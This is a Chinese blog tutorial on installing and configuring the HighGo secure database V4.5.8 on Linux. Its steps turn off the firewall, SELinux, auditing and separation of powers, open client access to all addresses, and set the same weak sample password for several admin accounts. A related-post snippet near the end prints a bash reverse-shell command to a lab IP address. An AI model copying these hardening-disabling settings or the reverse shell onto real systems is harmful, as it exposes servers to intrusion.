瀚高安全版数据库系统V4.5.8搭建部署手册

已于 2025-09-16 16:08:11 修改
阅读量546 收藏 15
点赞数 14
CC 4.0 BY-SA版权
文章标签: 数据库 linux
于 2025-09-16 15:23:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liaozexing/article/details/151756878

       瀚高数据库安全版V4.5.8以及后续版本启用新的打包机制后,不再区分介质操作系统型号,只需要根据CPU型号选取合适的介质即可。新加瀚高数据库图形化配置助手。可以提供图形化初始化数据库、配置数据库、删除数据库实例和恢复数据库实例的方法,可以方便快捷的对数据库进行初始化、数据库的参数进行配置,也可以快捷方便的删除数据库初始化好的实例、恢复删除已有的实例。

命令行安装

1、环境准备

1、防火墙设置

①关闭防火墙,执行如下命令(针对Linux系统)

systemctl stop firewalld.service

systemctl disable firewalld.service

systemctl status firewalld.service

②防火墙如果不能关闭,要确认端口是否已经打开,查看方法:

firewall-cmd --query-port=5866/tcp                                  --提示no表示未开,开放方法:

firewall-cmd --add-port=5866/tcp –permanent                --提示 success 表示成功

systemctl restart firewalld.service                                    --重启防火墙

2、SELINUX设置

①关闭 SELINUX(针对Linux系统)

[root@hgdb ]# sed -i "s/SELINUX=enforcing/SELINUX=disabled/g" /etc/selinux/config

[root@hgdb ]# setenforce 0

[root@hgdb ]# cat /etc/selinux/config | grep SELINUX=disabled

[root@hgdb ]# getenforce

②或者直接打开文件进行编辑:

[root@hgdb ]# vi /etc/selinux/config                         --编辑SELINUX=disabled

[root@hgdb ]# cat /etc/selinux/config

用cat命令进行查看,确认SELINUX=disabled

3、时区检查

timedatectl                                                               --检查时区

timedatectl set-timezone Asia/Shanghai                  --修改时区,例如为上海

2、上传的介质列表

(1)hgdb-see-4.5.8-db43858.x86_64.rpm

(2)hgdb-see-4.5.8-db43858.x86_64.rpm.md5

(3)hgdb_0_t.lic

(4)p001_see_4.5.8_fh_db43858.x86_64.rpm

(5)p001_see_4.5.8_fh_db43858.x86_64.rpm.md5

p001 是postgis包, 数据库安装成功后,直接rpm -i 安装p001(不需要postgis扩展时不需要安装,且无此包)

3、安装介质

安装数据库安装包:

(1)rpm –ivh hgdb-see-4.5.8-db43858.x86_64.rpm

(如果是deb文件:dpkg –i hgdb-see-4.5.8-db43858.x86_64.deb )

在默认路径/opt/highgo/下会得到解压后的安装文件,图形化安装进行hgdbconfig执行图形化安装./run.sh

(2)手动安装执行initdb命令

4、postgis安装配置

p001 是postgis包, 数据库安装成功后,直接rpm -ivh安装p001即可。

[root@hgdb home]# rpm -ivh p001_see_4.5.8_fh_db43858.x86_64.rpm

5、配置环境变量

1、默认的环境变量(数据库自动生成)

cat /opt/highgo/hgdb-see-4.5.8/etc/hgdbenv.sample

export HG_BASE=/opt/highgo

export HGDB_HOME=/opt/highgo/hgdb-see-4.5.8

export PGPORT=5866

export PGDATABASE=highgo

export PATH=/opt/highgo/hgdb-see-4.5.8/bin:$PATH

export PGDATA=$HGDB_HOME/data

2、设置环境变量文件

cp /opt/highgo/hgdb-see-4.5.8/etc/hgdbenv.sample /opt/highgo/hgdb-see-4.5.8/etc/hgdbenv.env

3、配置环境变量(rpm一般:vi ~/.bash_profile;deb系统一般:vi /etc/profile)

在 ~/.bash_profile环境变量文件最后追加如下内容:

source /opt/highgo/hgdb-see-4.5.8/etc/hgdbenv.env

4、使环境变量生效

(1)source ~/.bash_profile

(2)验证环境变量是否生效:

echo $PGDATA

6、初始化data目录

1、初始化data目录

(1)指定 md5认证方式( $PGDATA=/opt/highgo/hgdb-see-4.5.8/data )

initdb -D $PGDATA -A md5 > /opt/highgo/hgdb-see-4.5.8/etc/initdb.log

7、配置参数文件

1、配置pg_hba.conf文件(本例初始化data目录使用的是md5):

host                all       all     0.0.0.0/0           md5

hostnossl        all       all     0.0.0.0/0           md5

hostssl            all       all     0.0.0.0/0           cert

2、生成ssl认证文件

[root@hgdb1 bin]# ./hg_sslkeygen.sh $PGDATA

3、拷贝授权文件至data目录

[root@hgdb1 bin]# mv /home/hgdb_0_t.lic $HGDB_HOME/etc/lic/hgdb.lic

[root@hgdb lic]# chmod 0600 hgdb.lic

[root@hgdb lic]# hg_lic

4、启动数据库

[root@hgdb1 bin]# pg_ctl start

5、登录数据库并配置数据库参数

[root@hgdb1 bin]# psql -U sysdba -d highgo

alter system set listen_addresses = '*‘;

及其他数据库参数配置和改密码有效期等,详细内容请参考备注

6、重启数据库使配置参数生效

[root@hgdb1 bin]# pg_ctl restart

备注:

1、安全管理员登录:psql highgo syssso

select set_secure_param('hg_sepofpowers','off');

select set_secure_param('hg_macontrol','min');

select set_secure_param('hg_rowsecure','off');

select set_secure_param('hg_showlogininfo','off');

select set_secure_param('hg_clientnoinput','0');

select set_secure_param('hg_idcheck.pwdvaliduntil','0');

alter user syssso password 'Hello@1234’;

2、审计管理员登录:psql highgo syssao

select set_audit_param('hg_audit','off');

alter user syssao password 'Hello@1234’;

3、数据库管理员登录:psql highgo sysdba

alter system set wal_log_hints=on;

alter system set full_page_writes = on;

alter system set wal_keep_segments=100;

alter system set max_connections = 800;

alter system set work_mem='16MB';

alter system set shared_buffers = ‘1GB’;--内存的25%

alter system set checkpoint_completion_target = 0.8;

alter system set log_destination = 'csvlog';

alter system set logging_collector = on;

alter system set log_directory = 'hgdb_log';

alter system set log_filename = 'highgodb_%d.log';

alter system set log_rotation_age = '1d';

alter system set log_rotation_size = 0;

alter system set log_truncate_on_rotation = on;

alter system set log_statement = 'ddl';

alter system set log_connections=on;

alter system set log_disconnections=on;

alter system set checkpoint_timeout='30min';

alter system set maintenance_work_mem='1GB';

alter user sysdba password 'Hello@1234’;

4、重启数据库生效:pg_ctl restart

8、创建postgis扩展

1、创建所需的postgis扩展:

highgo=# create extension postgis;

highgo=# create extension postgis_raster;

highgo=# create extension postgis_sfcgal;

highgo=# create extension

postgis_tiger_geocoder cascade;

highgo=# create extension postgis_topology;

图形化安装

1、上传介质

2、安装数据库介质和postgis扩展

3、自定义data安装路径

4、打开瀚高数据库配置助手图形化工具

5、数据库文件配置

6、初始化data目录

7、数据库配置

8、完成配置

廖泽兴
关注
国产瀚高数据库rpm安装包,含安装脚本
11-14
国产瀚高数据库rpm安装包,含安装脚本,需要arm架构服务器,将资源上传到服务器后执行sh deploy.sh脚本即可自动安装。默认账号sysdba 密码:Aa123456@ jdbc连接示例 driver=com.highgo.jdbc.Driver conn=jdbc:highgo...
瀚高数据库连接工具,用于连接到本地或远程的瀚高数据库 请区别于瀚高迁移工具
07-24
注意:本地网络必须能正常连接到瀚高数据库 有2种方式: 本机和服务器网络 互通,可以直接连接到上文中安装的服务器端的瀚高数据库; 本机和服务器网络 不互通,则需要在本地安装瀚高数据库(可联系对方工程师远程...
瀚高数据库安全v4.5.8安装步骤
Auspicious航的博客
06-06 3553
CPU: x86_64(虚拟机)操作系统:Centos 7.9数据库介质:hgdb-see-4.5.8-db43858.x86_64.rpm。
瀚高数据库安全 V4.5.8 deb本安装包 安装教程
Yangzhenqwer的博客
12-28 1257
设置 #listen_addresses = 'localhost' 修改为 listen_addresses = '*' (去掉 # 注释,使其生效)2) 启动数据库./pg_ctl -D /opt/highgo/hgdb-see-4.5.8/etc/P002/data -l logfile start。1) bin 目录下执行 ./initdb -A md5 -D /opt/highgo/hgdb-see-4.5.8/etc/P002/data;1) 返回bin目录:cd ../bin。
【最佳实践】瀚高数据库安全v4.5.8安装
丘处机的专栏
07-25 3640
瀚高数据库安全v4.5.8已发布,功能和安装方式都有所不同。下面先跟我一起安装上吧。操作系统环境Centos7.9,处理器x86_64
瀚高数据库安全v4.5.8安装步骤--centos7
lemon_TEN的博客
05-29 1000
安装完后,默认是一个月的试用期,如果需要延长,请联系瀚高商务人员申请更长的授权。到此,安装可以暂告一段落,可以满足适配测试。注意:如果前面初始化用的是md5校验密码,需要将sm3改为md5,如果要生效,需要重启数据库服务,切记。便于快速无交互初始化,初始化完成后,就不再使用,可以删除也可以保留便于重新初始化。# 注意:根据实际物理内存,修改shared_buffers为物理内存的1/4。(说明:以下每一节的命令操作,均可以复制粘贴直接执行)操作系统环境:Centos7,处理器:x86_64
瀚高安全4.5.8部署Linux单机
QHuanFa的博客
06-21 2539
本说明:瀚高安全4.5.8
瀚高数据库V4.5.8简易安装
weixin_54233011的博客
11-06 697
【代码】瀚高数据库V4.5.8简易安装。
【最佳实践】瀚高数据库安全v4.5.8非root用户运行的安装配置
丘处机的专栏
11-24 1709
瀚高数据库安全、非root用户、安装配置、部署
瀚高数据库 docker 容器单机运行(安全v4.5.9)
丘处机的专栏
06-29 2216
瀚高数据库安全v4.5.9,docker容器运行,单机环境,docker18.03.0
瀚高数据库4.5.8-db43858在x86上快速安装
lucy_sky的博客
04-25 239
重启 pg_ctl restart -D /opt/highgo/hgdb-see-4.5.8/data。在 /opt/highgo/hgdb-see-4.5.8/etc/ 下面的laststep.sh。查看状态 pg_controldata /opt/highgo/hgdb-see-4.5.8/data。停止 pg_ctl stop -D /opt/highgo/hgdb-see-4.5.8/data。切换到另一个数据库并指定用户:\c mydatabase myuser。查看所有用户:\du。
瀚高(highgo)4.5.7数据库rpm安装包
08-17
hgdb4.5.7-see-centos7-x86-64-20210804.rpm 安装方法可以参考:CentOS上使用rpm安装瀚高数据库(highgo) 地址:https://blog.csdn.net/oDengWei/article/details/119749137
瀚高数据库
08-08
hgdb 唯一的公开数据库下载资源 hgdb 唯一的公开数据库下载资源 hgdb 唯一的公开数据库下载资源 hgdb 唯一的公开数据库下载资源
MongoDB - 连接
最新发布
nmxiaocui的博客
09-15 839
本文介绍了MongoDB的连接方式,包括标准URI连接语法和多种编程语言的连接示例。主要内容包括: 标准连接格式解析,包含认证信息、服务器地址、端口等参数 不同场景的连接示例(本地连接、远程连接、副本集连接等) 常见连接选项说明(认证数据库、SSL、超时设置等) Python、Node.js、PHP、Java等语言的连接代码示例 Shell连接方式和带认证连接的具体操作 文章提供了完整的连接参数说明和实用代码片段,适合开发者快速实现MongoDB连接。
docke笔记下篇
二月鸟
09-13 1166
搜索镜像拉取镜像查看镜像启动镜像 - 服务端口映射停止容器移除容器从应用软件的角度来看,Dockerfile、Docker镜像与Docker容器分别代表软件的三个不同阶段,● Dockerfile是软件的原材料● Docker镜像是软件的交付品● Docker容器则可以认为是软件镜像的运行态,也即依照镜像运行的容器实例Dockerfile面向开发,Docker镜像成为交付标准,Docker容器则涉及部署与运维,三者缺一不可,合力充当Docker体系的基石。
为什么要显示调用析构函数
python_girl9475的博客
09-11 355
如果类内存在手动申请的资源、数据库连接、文件句柄、网络连接,则无法释放,会造成资源泄露。
Qt信号与槽
m0_73634434的博客
09-14 977
在 Qt 中,用户与控件的交互(如点击按钮、关闭窗口)被定义为事件,每个事件会触发一个信号,而控件对信号做出的响应动作则称为槽。信号与槽是 Qt 特有的消息传输机制,能将独立的控件关联起来(例如 “点击按钮关闭窗口”),实现交互逻辑。除了 Qt 内置的信号槽,开发者可根据需求自定义,需遵循严格的语法规范。1.头文件(widget.h)声明2.源文件(widget.cpp)实现场景:老师发出 “上课了” 信号,学生响应 “回到座位学习”。1.在源⽂件中新建两个类,⼀个是⽼师类,⼀个是学⽣类;
Tempus Fugit: 3靶场
sucker的博客
09-14 882
bash -c 'bash -i >& /dev/tcp/192.168.23.128/4444 0>&1' 的目的是在目标机上发起一个反向交互 shell,向远端 IP 192.168.23.128 的端口 4444 建立 TCP 连接,并把当前 shell 的输入/输出都重定向到该连接(攻击者在该端口上监听即可获得交互式 shell)。URL测试一下{{7*7}},页面回显不一样了,报错回显中URL参数变成了49,说明{{7*7}}被当作命令执行了,标准的python模板注入漏洞。
数据库(一)数据库基础及MySql 5.7+的编译安装
qq_55656748的博客
09-13 580
在数据驱动的现代信息系统中,数据库是存储、管理核心数据的关键载体,从日常社交、电商平台到企业级管理系统,均需其提供底层支撑。掌握数据库知识,是开发者与运维人员的核心技能之一。本文聚焦数据库核心知识,先梳理数据库的基础概念、发展历程与分类(含关系型与非关系型数据库对比),再详解数据库安装步骤,最后深入 MySQL 的日常管理操作(含 SQL 语句应用、用户权限控制等),为读者构建从理论到实践的完整数据库知识框架,夯实后续深入学习的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值